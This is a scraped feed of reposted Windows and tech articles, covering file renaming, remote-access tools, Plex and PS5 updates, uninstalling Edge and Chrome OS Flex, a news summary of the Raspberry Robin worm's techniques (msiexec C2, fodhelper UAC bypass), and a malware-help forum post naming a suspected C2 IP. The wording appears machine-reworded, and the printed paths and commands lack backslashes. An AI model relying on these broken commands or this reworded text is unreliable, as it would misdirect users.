Windows Installer – Garageband For Windows PC http://garagebandforwindowspc.org/ Tue, 17 May 2022 06:18:59 +0000 en-US hourly 1 https://wordpress.org/?v=5.9.3 https://garagebandforwindowspc.org/wp-content/uploads/2021/07/icon-4-138x136.png Windows Installer – Garageband For Windows PC http://garagebandforwindowspc.org/ 32 32 How to batch rename files in Windows 11 (2022) https://garagebandforwindowspc.org/how-to-batch-rename-files-in-windows-11-2022/ Tue, 17 May 2022 05:53:13 +0000 https://garagebandforwindowspc.org/how-to-batch-rename-files-in-windows-11-2022/ When you are dealing with a large collection of files, there are times when you would want to rename them all simultaneously to manage them better. Renaming all files manually can be a frustrating experience, but Windows 11 offers several ways to rename your files in bulk. In this article, we will walk through the […]]]>

When you are dealing with a large collection of files, there are times when you would want to rename them all simultaneously to manage them better. Renaming all files manually can be a frustrating experience, but Windows 11 offers several ways to rename your files in bulk. In this article, we will walk through the steps to rename files in batch in Windows 11.

Rename Files in Batch in Windows 11 (2022)

Rename Files in Batch with Windows 11 File Explorer

Did you know that you can use the default Windows 11 File Explorer to rename files in batches? Although not as versatile as PowerToys or other third-party batch file renaming software, it does the job for most users. This is how it works:

1. Open File Explorer using Windows 11 hotkey ‘Win + E’ and select the files you want to rename. Right-click on the selected files and click on the “Rename” icon from the context menu. You can also use the “F2” keyboard shortcut to rename files.

2. Enter the new file name and press the Enter key. While you will see the text box in one of the selected images, it should be noted that Windows will assign the same name to all selected files with different numbers.

enter a new name for the files

3. As you can see in the image below, Windows batch renamed all selected files using the same name. If you don’t mind having a number at the end of the filename, that’s all you need to easily rename multiple files on Windows 11.

batch renaming output

Use PowerToys to Batch File Rename in Windows 11

1. Download the latest version of PowerToys installer from GitHub and run the installer file. Follow the on-screen instructions to complete setup and open PowerToys.

install powertoys to batch rename files in windows 11

2. When PowerToys opens, switch to the “PowerRename” tab in the left sidebar and click “Open Settings” to review your PowerRename settings.

show powerrename settings

3. By default, you will notice that the “Enable PowerRename” toggle is enabled. If not, enable it to use PowerRename.

enable powerrename to batch rename files in Windows 11

4. Select the files you want to rename and right click on them. Click “Show more options” to expand the context menu and choose “PowerRename”.

show powerrename settings to batch rename files in windows 11

5. When the PowerRename interface appears, type the word you want to replace in the upper box and the replacement word in the “Replace with” text box.

add text to find and replace

6. Click the “Apply” button on the lower left corner of the application to batch rename files in Windows 11 using PowerRename.

click apply to batch rename files in Windows 11

Third-Party Application to Batch Rename Windows 11 Files

You may also consider using dedicated batch renaming software to rename files in bulk. Although there are many options, one software we recommend is FastStone’s Photo Resizer. Although the app looks a bit dated, it’s fast and has a negligible learning curve.

1. Install FastStone Photo Resizer (download) and navigate to the folder containing the files you want to rename. Select the files and click the “Add” button to add them to the rename queue.

add files to queue

2. Now you can set the common name using the filename pattern or search and replace specific words in the filename. You also have the option of using name, year, date, etc. from the parent folder using the symbols detailed in the tips section of the app. After defining the desired name and format, click “Rename” button to rename files in bulk.

edit file name and rename to batch rename files in Windows 11

3. The app will show you a confirmation prompt. Click “Yes” to confirm the changes.

confirm file renaming

4. FastStone will now rename the files you selected, and you can see the results on the next page.

file batch renaming results

Easily rename files in bulk in Windows 11

So, those are three ways to batch rename files in Windows 11. In the meantime, be sure to check out our other guides to always run apps as an administrator in Windows 11 and how to add a guest account in Windows 11 Moreover, you can also check our article on the best hidden features of Windows 11 to further explore these features.

]]>
May 2022 Best Software to Manage Windows Remotely https://garagebandforwindowspc.org/may-2022-best-software-to-manage-windows-remotely/ Fri, 13 May 2022 21:05:04 +0000 https://garagebandforwindowspc.org/may-2022-best-software-to-manage-windows-remotely/ This list is about the best software to manage Windows remotely. We will do our best for you to understand this list of the best software to manage Windows remotely. I hope you like this list Best Software to Manage Windows Remotely. So let’s start: Table of Contents: Best Software to Manage Windows Remotely Remote […]]]>

This list is about the best software to manage Windows remotely. We will do our best for you to understand this list of the best software to manage Windows remotely. I hope you like this list Best Software to Manage Windows Remotely. So let’s start:

Table of Contents: Best Software to Manage Windows Remotely

Remote access software allows one computer to view or control another computer, not just over a network, but from anywhere in the world. You can use it to connect to your customers’ computers and show them how to run a program or solve their technical problems. Or you can even use it to invite friends or clients to view your desktop while you run a demo for them. You can use the screen as a temporary whiteboard and draw lines and circles that will help your friends or clients understand what you are doing on your computer or their computer. Remote desktop software is a type of software or feature that allows the local system desktop environment to run remotely on one of the systems while it is on another system.

The word “remote” refers to a local connection. In a nutshell, remote access software helps the user to access another user’s computer on their local system through the software on the same network to solve business related issues such as sharing desktop, remote control, file transfer. , etc. These tools are widely used by organizational help desks. to solve the problems encountered by the customer, thus saving time and reducing complexity and increasing customer satisfaction as a result.

Here is the list of the best software to manage Windows remotely

Zoho Support

Zoho Assist is a multifunctional remote assistance software that helps you with remote assistance, unattended computer access, and screen sharing. Zoho Assist support plans include features like remote printing and brand customization. They’re great for people like help desk technicians and IT administrators. More advanced features are also accessible, with premium plans. Easy management of unattended computers with features like team grouping and departments.

Zoho Assist is protected by some of the best security integrations we’ve seen, which means it’s a great option for those who work with sensitive data. Zoho Assist is compatible with Windows, Mac, and Linux computers, Android and iOS devices, Raspberry Pi devices, and Chromebooks, so it can support a wide range of clients. Technicians can start sessions from their favorite browser or from the mobile or desktop app. Mass deployment options to configure large numbers of computers for unattended access.

remote computer

RemotePC is a popular desktop software tool that helps you stay connected to your home or office system without having to travel. RemotePC is a very popular remote computer access application suitable for both home users and especially business users. It uses cloud technology to deliver state-of-the-art remote access solutions through an intuitive web application and native desktop and mobile apps. RemotePC has a good interface with a simple and straightforward learning curve.

RemotePC is highly secure, scalable and affordable. It also includes collaboration features such as voice chat. In effect, you call a person to temporarily access our system to work on presentations or documents in real time. It is mainly used by small organizations that require remote access. Enterprise plans include support for advanced computer and user management, as well as RemotePC Help Desk for on-demand remote support, ideal for large IT support companies.

connection control

You must create an Access Agent installer to access it. Then you can share files and folders with whoever you want and keep your desktop clean with a simple drag-and-drop feature. With special role-based permissions, you can choose who to share your private documents with, even if you assign different roles to different people.

ConnectWise Control provides highly specialized remote access solutions for specific users. Their three support plans come with remote access features and include powerful tools to help IT staff and help desk technicians resolve issues remotely. The access plan supports 25 devices and is for those who want to connect to many remote devices.

parallel access

Parallels is long-loved software with full-screen operation and plenty of tools to make your life easier when working remotely. The Lock’n’Go magnifier has fantastic readability, so you can choose your text size. In addition, there are device-specific benefits. For example, if you’re using an Android, you can put your favorite apps on your home screen. It supports computer-to-computer connections, but most of its features are mobile-centric.

Parallels Access is strongly aimed at those who want to access their desktop computers from a mobile device. If you’re a Mac user, you’ll probably find the program easy to use as it incorporates all the gestures you’re already used to, like swipe to scroll or pinch to zoom. Parallels Access is designed for remote access to computers from mobile devices.

Team Viewer desktop tool

TeamViewer is a powerful remote access program that enables remote access from and to computers, mobile devices, network machines, etc. Over 2.5 billion devices use TeamViewer for its fantastic support and broad compatibility. Work from a remote PC, mobile phone or even another server and still get the access you need to continue your work and without the traditional VPN normally required. Team Viewer features remote device control and provides powerful cross-platform access.

Team Viewer focuses on cloud-based technologies to enable online remote support and collaboration on a global scale. It acts as a catalyst to promote and amplify people’s ideas and their ability to solve problems and overcome challenges. It’s designed to give users the ability to provide instant support to their teams and customers, whether it’s IT outages or outages. It wakes up, restarts and installs apps automatically.

Chrome Remote Desktop

With over 10 million installs, Google’s Chrome Remote Desktop is a leading free software tool for remote access. It’s easy to share your screen or connect to another computer. If you run into a problem, remote assistance is also available. That’s not all. If you forget your unlocked computer at home, it’s easy to access and secure it from home. The app also includes dedicated menu options for Ctrl-Alt-Delete and Print Screen.

Chrome Remote Desktop offers several useful features that simplify the experience and enable cross-device functionality. While using a desktop from another location can present logistical challenges, Chrome Remote Desktop makes it easy to avoid the most common pitfalls. The program is accessible by phone, tablet or other computer. It’s a super easy-to-use template that makes remote access simple.

remote desktop manager

This platform not only allows your team to remotely access computers over a network. It also offers a variety of security and convenience features such as centralized password management, one-click logins, two-factor authentication, and role-based access controls. Remote Desktop Manager is capable of accessing more than just network desktops.

For individual users, including independent IT administrators, Remote Desktop Manager is free. There’s no access to most team features like role-based access controls and shared databases, but you can still remotely access your company’s networked computers and use built-in password management software. Another advantage of this platform is the centralized and encrypted vault that stores login credentials for different services on their network.

Final Words: Best Software to Manage Windows Remotely

I hope you understand and like this list Best Software to Manage Windows Remotely, if your answer is no, you can ask anything via the contact forum section linked to this article. And if your answer is yes, please share this list with your family and friends.

]]>
Stack Overflow examines how developers deal with stress • The Register https://garagebandforwindowspc.org/stack-overflow-examines-how-developers-deal-with-stress-the-register/ Wed, 11 May 2022 21:44:00 +0000 https://garagebandforwindowspc.org/stack-overflow-examines-how-developers-deal-with-stress-the-register/ What are your peers doing to avoid burnout? Stack Overflow research suggests that about half of developers still spend their breaks in front of a screen. The Programming Q&A resource surveyed 800 developers and found that most of the top five things they do when they need a break involve screens: listening to music (46%), […]]]>

What are your peers doing to avoid burnout? Stack Overflow research suggests that about half of developers still spend their breaks in front of a screen.

The Programming Q&A resource surveyed 800 developers and found that most of the top five things they do when they need a break involve screens: listening to music (46%), visiting Stack Overflow (41 %), browsing social networks (37%), and watching videos (36%).

In fact, talking with other humans didn’t make the top five, and 4% of respondents had another outlet for stress (perhaps by angrily punching out really terse comments in the source).

Unsurprisingly, another takeaway from the survey was that the happiest developers had an employer that encouraged wellness, both physical and mental.

Sixty-two percent of respondents’ employers encouraged physical and mental well-being at work, and 75% of developers who described themselves as “happy” had just this type of employer. Alas, these figures mean that 38% of employers were not.

So how do you relieve stress?

Physical exercise is a good solution and half of the respondents go for a walk or do another activity when a break is needed.

“It’s one thing for an employer to encourage wellness; it’s another for people to actually change their habits to achieve their own wellness,” the Stack Overflow team noted. Eighty-eight percent of developers surveyed wanted to improve their physical well-being, while 83% wanted to improve their mental well-being.

However, there is a difference between wanting to improve and actually taking action to achieve it. After all, there are a fair number of gyms that seem to have business models based on signing up users and never bothering a treadmill again.

As for the developers surveyed, 57% tried to improve their well-being by simply drinking more water or improving their diet. Slightly fewer prioritized exercise while others intended to socialize with friends and family.

Stack Overflow cited research showing that two in five workers (out of more than 32,000 surveyed between January and September 2021) were at high risk of burnout. Sixty-two percent felt physically and emotionally drained, while 42% were considering quitting.

“Preventing burnout in a rapidly changing industry will always be a challenge,” the team observed. Employers can encourage workers to take breaks and prioritize wellness, but with more than a third of developers spending their breaks browsing social media, avoiding burnout means taking s further away from the keyboard.

Last year, a trio of boffins advised software developers to participate in mindful breathing to improve their sense of well-being.

Not surprisingly, software users aren’t the only ones feeling the strain of working long hours under immense pressure: in 2020, nearly one in five infosec professionals were considering quitting their job due to a overwork or burnout. ®

]]>
Plex users report blank or gray screen on Mac units after v.1.44.0 update https://garagebandforwindowspc.org/plex-users-report-blank-or-gray-screen-on-mac-units-after-v-1-44-0-update/ Tue, 10 May 2022 02:03:45 +0000 https://garagebandforwindowspc.org/plex-users-report-blank-or-gray-screen-on-mac-units-after-v-1-44-0-update/ Plex is one of the few media streaming services that allows users to play digital content from one machine to another. Over the years, the developers have added several new features to the app. Users can opt for the free service that lets them stream content from their personal library or Plex’s paid service and […]]]>

Plex is one of the few media streaming services that allows users to play digital content from one machine to another. Over the years, the developers have added several new features to the app.

Users can opt for the free service that lets them stream content from their personal library or Plex’s paid service and access content from MGM, Lionsgate, and Warner Bros, among others.

But lately, issues like interrupted fast forward and rewind feature and Plex Media server crash after v1.26.0.5715 update prevent many people from using the app.

Adding to the woes, Plex users who have updated the app to v1.44.0 on their Mac say they see a gray or blank screen and there is nothing they can do.

Some have already tried reinstalling the app, but that doesn’t help either. Many are confused and wonder if the developers are testing the app before releasing the update.

Here are some reports from Plex users who are stuck on gray or blank screen on their Mac after v1.44.0 update.

plex-blank-screen-mac-v1.44-update
Source

After auto-upgrading to the latest version of Plex Player for Mac, after launch, I get stuck on a gray screen with no ability to do anything (see attached screenshot) after the Plex logo appears. I tested on a secondary machine running the same build and didn’t have the same issue. The only difference between the two is that “Connect automatically” has been checked (set to yes/true) on the computer having the problem – my gut tells me it has something to do with it, as I already seen this “problem” before, but was always able to fix by rebooting.
(Source)

Same. Manually uninstalled all of the Plex related library. Restarted. New player installed 1.44.0.2981. Gray screen, can’t do anything. Preferences don’t even show up. Random clicks don’t seem to do anything. MacPro 6.1 with OS 10.14.6.
(Source)

Although the Plex developers have yet to comment on the issue, we have come across a workaround that seems to help those affected by the issue.

It forces users to uninstall the latest version, installing v1.34 and replacing it with v1.43. You can download the required packages here.

That said, I was finally able to get it working by first wiping everything, then finding an old installer package for Plex-1.34.1.2601-ff212e16-x86_64. It worked, but crashed after about 2 minutes, each time. I then found a package for Plex-1.43.4.2971-aa2133cc-x86_64, overwritten v. 1.34, and it currently works. I would like to revert to the version prior to 1.44.0.02981, but I’m afraid to rock the boat…
(Source)

We’ll let you know when the Plex developers fix the blank screen issue on Mac, so keep checking this space for more updates.

To note: We have more stories like this in our apps section, so be sure to follow those as well.

PiunikaWeb began as a purely investigative tech journalism website with a primary focus on “breaking” or “exclusive” news. In no time, our stories were picked up by Forbes, Foxnews, Gizmodo, TechCrunch, Engadget, The Verge, Macrumors and many more. Want to know more about us? Head here.

]]>
How to update your PS5 controller via your PC https://garagebandforwindowspc.org/how-to-update-your-ps5-controller-via-your-pc/ Sat, 07 May 2022 16:00:00 +0000 https://garagebandforwindowspc.org/how-to-update-your-ps5-controller-via-your-pc/ The PS5 controller, or the DualSense, is a fantastic controller. The features of the DualSense combined with its new shape and feel make it the ideal controller for a good portion of gamers, including PC gamers. Although the DualSense controller works with a PC, you needed a PS5 to update it. Well, not anymore. PlayStation […]]]>

The PS5 controller, or the DualSense, is a fantastic controller. The features of the DualSense combined with its new shape and feel make it the ideal controller for a good portion of gamers, including PC gamers.

Although the DualSense controller works with a PC, you needed a PS5 to update it. Well, not anymore. PlayStation has released an app that allows you to update your DualSense through your PC. Let’s explore how and why you should use it.

You can now update your PS5 controllers with a PC

Due to its impressive feedback and improved ergonomics, the DualSense has been the choice of many PC gamers this generation. While it’s easy to connect to a PC, there was one minor issue: you needed a PS5 to update the DualSense’s firmware.

Fortunately, this has now been taken care of. PlayStation has announced that PC gamers can now update their PS5 controllers on Windows 11 and select Windows 10 devices.

If you’re wondering why you should update your PS5 controller, one of the main reasons is to keep the controller’s haptic feedback and adaptive triggers compatible with the latest games. With each firmware update, the controller saves the latest versions of video games and is able to react accordingly.

So while your PS5 controller won’t lose its basic functions if you don’t update it, it won’t be at its best either. Considering haptic feedback and adaptive triggers are the two main upgrades for the PS5 controller, it’s a shame to let those features go to waste.

USE VIDEO OF THE DAY

How to update your PS5 controller using your PC

You can update your PS5 with your PC using the firmware updater app that Sony has developed just for this purpose. This app will detect and update your PS5 DualSense controller, and also notify you when a new update is available for it.

A wired connection and a Windows 10 or 11 PC are required for this task. The PlayStation 5 controller’s USB connector is USB-C, so you’ll need a USB-C cable to connect it to your PC. You should have received a USB-C cable in your PS5 package.

Although PlayStation has announced that the DualSense firmware updater will work on certain Windows 10 PCs, there have been no reports that the firmware does not work on specific versions of Windows 10. If you have a Windows 10 PC, so far, there is no reason to worry. .

  1. Download the DualSense firmware update app.
  2. Open the .exe file. It will be under the name FWUpdaterInstaller.exe.
  3. Follow the installer’s instructions. The installation process is simple.
  4. Open the firmware update app.

Once you launch the DualSense firmware update app, you’ll be greeted with a simplistic screen asking you to connect your PS5 controller. It’s obvious what you need to do now:

  1. Connect your PS5 controller to your PC with a USB-C cable. The app will then change to give information about your controller and tell you if an update is available.

  2. Click on Update now. The update process will now begin.

  3. Once you receive a message telling you that the update is complete, you can close the application.


That’s it! Your PS5 controller firmware is now running on its latest version, and you can go and enjoy PC games that support your controller’s immersive features.

Always up to date

Going out of your way to update your PS5 controller might seem redundant at first, but this isn’t just any simple gamepad. The DualSense is loaded with various features and hardware, and a firmware update to coordinate all of these features with the latest video games is recommended.

With the DualSense firmware update app, you no longer need to update your PS5 controller via a PS5 console. So go ahead and update your DualSense controller!


A DualSense controller in front of a PS5

The 7 Best PS5 Controllers

Read more


About the Author

]]>
New Raspberry Robin worm uses Windows Installer to remove malware https://garagebandforwindowspc.org/new-raspberry-robin-worm-uses-windows-installer-to-remove-malware/ Thu, 05 May 2022 21:36:35 +0000 https://garagebandforwindowspc.org/new-raspberry-robin-worm-uses-windows-installer-to-remove-malware/ Red Canary intelligence analysts have discovered new Windows malware with worming capabilities that spreads using external USB drives. This malware is related to a cluster of malicious activity called Raspberry Robin and was first observed in September 2021. Red Canary’s detection engineering team detected the worm in the networks of several customers, some in the […]]]>

Red Canary intelligence analysts have discovered new Windows malware with worming capabilities that spreads using external USB drives.

This malware is related to a cluster of malicious activity called Raspberry Robin and was first observed in September 2021.

Red Canary’s detection engineering team detected the worm in the networks of several customers, some in the technology and manufacturing industries.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Legitimate Windows tools misused to install malware

It uses Microsoft Standard Installer (msiexec.exe) to reach its command and control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installation packages, adversaries also use it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

Although they have not yet found out if it establishes persistence and by what methods, they suspect that the malware is installing a malicious DLL file. [1, 2] on compromised machines to resist deletion between reboots.

Raspberry Robin launches this DLL using two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows Settings) and odbcconf (an ODBC driver configuration tool).

The former allows it to bypass User Account Control (UAC), while the latter will help run and configure the DLL.

Raspberry Robin Worm Infection Stream
Raspberry Robin Worm Infection Stream (Red Canary)

How and why?

Although Red Canary analysts were able to closely inspect what the new discovery does on infected systems, there are still several questions that need to be answered.

“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely to happen offline or otherwise outside of our visibility. We don’t know. nor why Raspberry Robin installs a malicious DLL,” the researchers said.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to build confidence in this hypothesis.”

Since there is no information about the malicious end-stage tasks of this malware, another question that needs to be answered is what is the purpose of the Raspberry Robin operators.

Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK of this malware, can be found in Red Canary’s report.

]]>
How to uninstall Microsoft Edge from Windows 11 https://garagebandforwindowspc.org/how-to-uninstall-microsoft-edge-from-windows-11/ Tue, 03 May 2022 20:59:00 +0000 https://garagebandforwindowspc.org/how-to-uninstall-microsoft-edge-from-windows-11/ You cannot uninstall Microsoft Edge from Windows 11 in the conventional way – you have to resort to a specific command entered in a specific folder using the system command prompt. Image: Mark Kaelin/TechReoublic/Microsoft Microsoft Edge web browser is heavily integrated with Windows 11 and Windows 10 operating systems. For all intents and purposes, Edge […]]]>

You cannot uninstall Microsoft Edge from Windows 11 in the conventional way – you have to resort to a specific command entered in a specific folder using the system command prompt.

Image: Mark Kaelin/TechReoublic/Microsoft

Microsoft Edge web browser is heavily integrated with Windows 11 and Windows 10 operating systems. For all intents and purposes, Edge should not be removed or uninstalled from your system under any circumstances. However, many users still search for ways to remove Microsoft Edge despite the possible consequences.

TO SEE: Must-Have Resources for Safe and Secure Cloud Storage (TechRepublic Premium)

In Windows 11, there is a way to uninstall the Edge browser with a well-built command entered in the correct folder command prompt. The method is similar to the method used to remove Edge from Windows 10, but the caveats and consequences of removing it are even more pronounced. You were warned.

How to uninstall Microsoft Edge from Windows 11

First, a clarification. This method will uninstall Microsoft Edge from Windows 11, but it will not change the browser that your system sees as its default. First you need to install a new web browser on your system and make it the default browser. Changing your default web browser to something other than Edge is a simple process and should be done before attempting to completely uninstall Edge.

Once your new browser is installed, search for “default apps” in the Windows 11 search tool and choose the appropriate settings result. Scroll down the default apps page and choose Microsoft Edge (Figure A), then change the default settings for another browser or application. Once you have changed your default web browser, you can proceed with uninstalling Edge.

Figure A

Clarification number two. You cannot uninstall Microsoft Edge using normal methods. The process must be completed through the command prompt, and this command prompt must be located in the appropriate folder.

The first step is to find the appropriate folder. Open File Explorer and navigate to this folder:

C:Program Files (x86)MicrosoftEdgeApplication101.0.1210.32Installer

To note: The version number (101.0.1210.32) may be different on your system.

Copy the entire browse sequence to the Installer folder in the Windows clipboard (Figure B). We will use this recorded sequence to redirect the command prompt to the appropriate folder.

Figure B

Type “command prompt” into the Windows 11 search tool and select the appropriate item from the search results, making sure to select the administrative rights option (Figure C).

Figure C

With the command prompt open, type or copy these commands, of course using your version number:

cd/

Enter

cd Program Files (x86)MicrosoftEdgeApplication101.0.1210.32Installer

Enter

At the end of this sequence of commands, your command prompt should be in the correct folder (Figure D).

Figure D

Now type this command and then press Enter to uninstall Microsoft Edge from Windows 11.

setup.exe --uninstall --system-level --verbose-logging --force-uninstall

TO SEE: TechRepublic Premium Editorial Calendar: Downloadable IT Policies, Checklists, Toolkits, and Research (TechRepublic Premium)

To reinstall Microsoft Edge, search for the app on Microsoft Store and install it on your Windows 11 PC from there.

Again, it is important to emphasize that it is not necessary, nor recommended, to take the drastic step of completely uninstalling Microsoft Edge from your Windows 11 device. Changing your default browser will produce the same result and avoid consequences. unpredictable and unforeseen potential negatives.

]]>
How to remove Chrome OS Flex and reinstall Windows (2022) https://garagebandforwindowspc.org/how-to-remove-chrome-os-flex-and-reinstall-windows-2022/ Sat, 30 Apr 2022 08:37:47 +0000 https://garagebandforwindowspc.org/how-to-remove-chrome-os-flex-and-reinstall-windows-2022/ We recently wrote a tutorial on how to install Chrome OS Flex on a Windows PC, and the majority of users loved the lightweight Chrome OS profile. However, some users have started encountering issues such as Wi-Fi incompatibility, trackpad issues, Bluetooth disconnection, audio issues, etc. on Chrome OS Flex. Not to mention that some Windows […]]]>

We recently wrote a tutorial on how to install Chrome OS Flex on a Windows PC, and the majority of users loved the lightweight Chrome OS profile. However, some users have started encountering issues such as Wi-Fi incompatibility, trackpad issues, Bluetooth disconnection, audio issues, etc. on Chrome OS Flex. Not to mention that some Windows apps were missing on Chrome OS Flex, although you can run lightweight Windows apps on Chrome OS. Still, if you’re not impressed with Chrome OS Flex, here’s a simple guide on how to remove Chrome OS Flex and reinstall Windows 10 or 11. So on that note, let’s go ahead and learn how to uninstall Chrome OS Flex .

Remove Chrome OS Flex and reinstall Windows (2022)

1. First, you must create a bootable USB drive for Windows 10 or 11. You can follow our detailed guides on how to create bootable Windows 10 or how to create Windows 11 bootable USB. For this step, you will need a separate Windows PC.

2. After that, plug the bootable USB into the Chrome OS Flex machine and shut down the computer. Then turn on the computer and start pressing the start key immediately. You can find the boot key for your laptop or motherboard in the table below. This will bring up the boot device selection page.

Remove Chrome OS Flex and reinstall Windows (2022)

3. Here, choose the usb key in which you flashed Windows 10 or 11. Then press Enter.

Remove Chrome OS Flex and reinstall Windows (2022)

4. Now the Windows Installer setup will appear. For Windows 10 and 11, the steps are the same, so no worries about that. Here, click “Install now“.

Remove Chrome OS Flex and reinstall Windows (2022)

5. After that, click “I don’t have a product key” on the next page.

Remove Chrome OS Flex and reinstall Windows (2022)

6. Next, click “Custom: Install Windows only (advanced)“.

installing Windows

7. If there are multiple partitions, select each partition and click “To delete“. Do this for all partitions. This step will remove Chrome OS Flex from your computer. Now, when there is only one partition left, select it and click “New”. It will create additional partitions needed to run Windows.

installing Windows

8. Finally, click on “Following” and Windows 10/11 will start installing on your PC.

Remove Chrome OS Flex and reinstall Windows (2022)

9. After installation, your computer will restart and boot into the setup screen. Now you can sign in to your Microsoft account or follow our guide and create a local account on Windows 11.

installing Windows

10. Once the setup process is complete, you will be back to Windows. In my case, I removed Chrome OS Flex and reinstalled Windows 11. I’d suggest unlocking Windows 11 to at least have a usable experience on your low-end computer.

windows 11

Uninstall Chrome OS Flex from your PC

This is how you can uninstall Chrome OS Flex from your PC and reinstall Windows 10 or 11, depending on your preferences. If you have a low-end PC, I would suggest installing Tiny10, which is a lite version of Windows 10. Anyway, that’s it for this guide. If you are still having trouble removing Chrome OS Flex from your laptop, let us know in the comments section below. We will try to help you.

]]>
Viruses/Powershell scripts run daily https://garagebandforwindowspc.org/viruses-powershell-scripts-run-daily/ Thu, 28 Apr 2022 16:50:18 +0000 https://garagebandforwindowspc.org/viruses-powershell-scripts-run-daily/ Hello everyone, It looks like there is a Powershell infection in my computer. Bitdefender Total Security is unable to detect any files, but displays the following notifications: Every time I see these things related to powershell.exe it’s always tied to the IP 152.89.247.113 Other dangerous pages seen in Bitdefender, BE CAREFUL NOT TO INFECT YOURSELF […]]]>

Hello everyone,

It looks like there is a Powershell infection in my computer. Bitdefender Total Security is unable to detect any files, but displays the following notifications:

Every time I see these things related to powershell.exe it’s always tied to the IP 152.89.247.113

Other dangerous pages seen in Bitdefender, BE CAREFUL NOT TO INFECT YOURSELF TOO:
EDIT: links removed

I ran FRST64, there are the logs.

FRST.txt:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2022
Ran by Phenom (administrator) on DESKTOP-QF06V5V (Gigabyte Technology Co., Ltd. B450 GAMING X) (28-04-2022 19:03:26)
Running from C:UsersPhenomDesktop
Loaded Profiles: Phenom & User
Platform: Microsoft Windows 11 Pro Version 21H2 22000.652 (X64) Language: English (United States)
Default browser: "C:Program FilesGoogleChrome BetaApplicationchrome.exe" --single-argument %1
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Blizzard Entertainment, Inc. -> Blizzard Entertainment) C:ProgramDataBattle.netAgentAgent.7661Agent.exe
(C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:Program Files (x86)Epic GamesLauncherEngineBinariesWin64EpicWebHelper.exe <2>
(C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureFreedomeFreedome1.1Freedome.exe
(C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404FsPisces.exe
(C:Program FilesBitdefender AgentProductAgentService.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender Agent26.0.1.220DiscoverySrv.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdagent.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdntwrk.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdwtxag.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securityseccenter.exe
(C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe ->) (Malwarebytes Inc -> Malwarebytes) C:Program FilesMalwarebytesAnti-Malwarembamtray.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32rundll32.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA Share.exe <3>
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationShadowPlaynvsphelper64.exe
(C:Program FilesRogueKillerRogueKillerSvc.exe ->) (ADLICE -> ) C:Program FilesRogueKillerRogueKiller64.exe
(C:Program FilesWindowsAppsMicrosoftWindows.Client.WebExperience_421.20070.95.0_x64__cw5n1h2txyewyDashboardWidgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:Program Files (x86)MicrosoftEdgeWebViewApplication100.0.1185.50msedgewebview2.exe <6>
(Discord Inc. -> Discord Inc.) C:UsersPhenomAppDataLocalDiscordCanaryapp-1.0.46DiscordCanary.exe <6>
(Epic Games Inc. -> Epic Games, Inc.) C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe
(explorer.exe ->) (Blizzard Entertainment, Inc. -> Blizzard Entertainment) C:Program Files (x86)Battle.netBattle.net.exe <3>
(explorer.exe ->) (Ghisler Software GmbH -> Ghisler Software GmbH) C:Program FilesTotal CommanderTOTALCMD64.EXE
(explorer.exe ->) (Google LLC -> Google LLC) C:Program FilesGoogleChrome BetaApplicationchrome.exe <57>
(Google LLC -> Google LLC) C:Program Files (x86)GoogleUpdate1.3.36.132GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:Program Files (x86)GoogleUpdate1.3.36.132GoogleCrashHandler64.exe
(HP Inc.) C:Program FilesWindowsAppsAD2F1837.OMENCommandCenter_1101.2203.4.0_x64__v10z8vjag6ke6win32OmenCommandCenterBackground.exe
(Microsoft Windows -> Microsoft Corporation) C:Program FilesWindows NTAccessorieswordpad.exe
(Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32Taskmgr.exe
(Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
(Nvidia Corporation -> Node.js) C:Program Files (x86)NVIDIA CorporationNvNodeNVIDIA Web Helper.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:Program FilesCCleanerCCleaner64.exe
(services.exe ->) (ADLICE -> ) C:Program FilesRogueKillerRogueKillerSvc.exe
(services.exe ->) (Avira Operations GmbH & Co. KG) [File not signed] C:Program Files (x86)AviraVPNAvira.VpnService.exe
